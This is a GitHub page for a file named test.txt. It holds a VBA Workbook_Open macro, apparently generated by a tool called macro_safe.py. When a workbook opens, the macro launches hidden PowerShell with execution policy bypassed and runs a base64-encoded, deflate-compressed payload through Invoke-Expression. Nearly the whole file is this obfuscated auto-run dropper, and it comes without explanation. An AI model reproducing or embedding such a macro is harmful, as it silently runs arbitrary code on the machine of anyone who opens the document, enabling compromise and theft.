-
Notifications
You must be signed in to change notification settings - Fork 115
/
test.txt
executable file
·57 lines (50 loc) · 2.52 KB
/
test.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
Sub Workbook_Open()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String
Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
Command = "powershell.exe"
End If
str = "nVVNj9s2EL37VxCGDjbWWlDfUowFkjQoEKAoCuwiORg+UBKVFSJLhi"
str = str + "Sn3rT979V78ihNeylyGXI4nDffpFOoB/V6vTq8a5r3p3PXj5"
str = str + "v1Z9u3tgn8+7Jp1tujOl/ypi7UMJpxWux1nOTqfTv+NvbqQ9"
str = str + "2PF9O8aZqu2NzOft+pS92O6npbX27r1+3+h+381Fsz2qfnaS"
str = str + "nFzuWG+2Wnvlm+7f5h+3byb+un4UvRj//H9smeBjtu/ou8RL"
str = str + "V+vXK6KZFvytJ9ejlb5U46ue3f2apu67HuWuUUyv3VnKxaf6"
str = str + "zbwF8rt5244WwKq3jy86UtcHNQ7tkMw/jcX1bO9cHpXr36Ls"
str = str + "l6p6+e1liCeQn1dq8Ob19GezgenQEV1dfc4EIxkTiZSBFNpA"
str = str + "xAMrC+7JJwIj5IBRJZqOFeAWnuAT+dSMqzeCIa9wIIIrIVSC"
str = str + "AsddOI3gEZUkPdHHggpZZ7Bv4F8CWAhsbO4swHfFCCwFrJM0"
str = str + "g9qOVwKEsktpRJIDJQDE1CUEEtgjSDaylIVUpsFhlKmYOSOY"
str = str + "U16MYQ5NAtc/Evxq7CZQ2UnGkCG0EaMs9AMRCUMO6lwob0Cg"
str = str + "ApruQEgI0kF3fnYIBSwY2KmWRsVsJKYShBXlIgB0bgC7B+II"
str = str + "IwlGRbqBXQMNjFWi5bqEWAT8DqQgRpIgWN2Rb5UhlI86XIFq"
str = str + "AZgvG1+BzDPx1JlJp2Yyl3yFYppVVYD17xCOVLNhiWz3rAjQ"
str = str + "SsZWLZnbgSIe1+JoIArhX0IJU+YICsNOvGHgqBFzF8RFkyXj"
str = str + "YXPWXNwcaZSKNQ0mljgfKxS0AM5whQRi+OI47CSvHYwF4mNT"
str = str + "eLp8YXXWaSLcWasw+yTNoiYY3YxYCPFl27tF7FXiuljBnUwk"
str = str + "TcyOZnYncbRI4uExtbSYnPSWGRkyU5RhwK6DjTjrpxSOaWB8"
str = str + "vRSI00nEEwsSdFZsIINV8G64FkyxvBCfWXJ4iTPJcCyHN7J+"
str = str + "IuI+eLVHCIOUeA8gGVccCWTJbAywDPwYnpPbtuaR9WK1zmgy"
str = str + "8S35d5XJawkmXi+ZCx/zj7c0G/DTZB+TYZcZxnIcJKlleFxU"
str = str + "siyQEbLrPSXExxtpSWYTHKykih+HrzueZUsH34YnL8MnjAoe"
str = str + "MkJ9QFa/V+VXW92jj1g947tXIbOzFDcf+LbT+Nz663nU7v7r"
str = str + "bqD/w6t2/vMP97x41zvX/qJibwN9s7p97u1KR6cOrjTnlb9a"
str = str + "fqLqPbXppm/9fK+cp/67tPe/Jg51x3WPBfPY6mH93Hxtqzch"
str = str + "9t0bWlwrem9d8="
exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""
Shell exec,vbHide
End Sub
'---Generated by macro_safe.py by khr0x40sh---
'---VBA arch detection by "T"---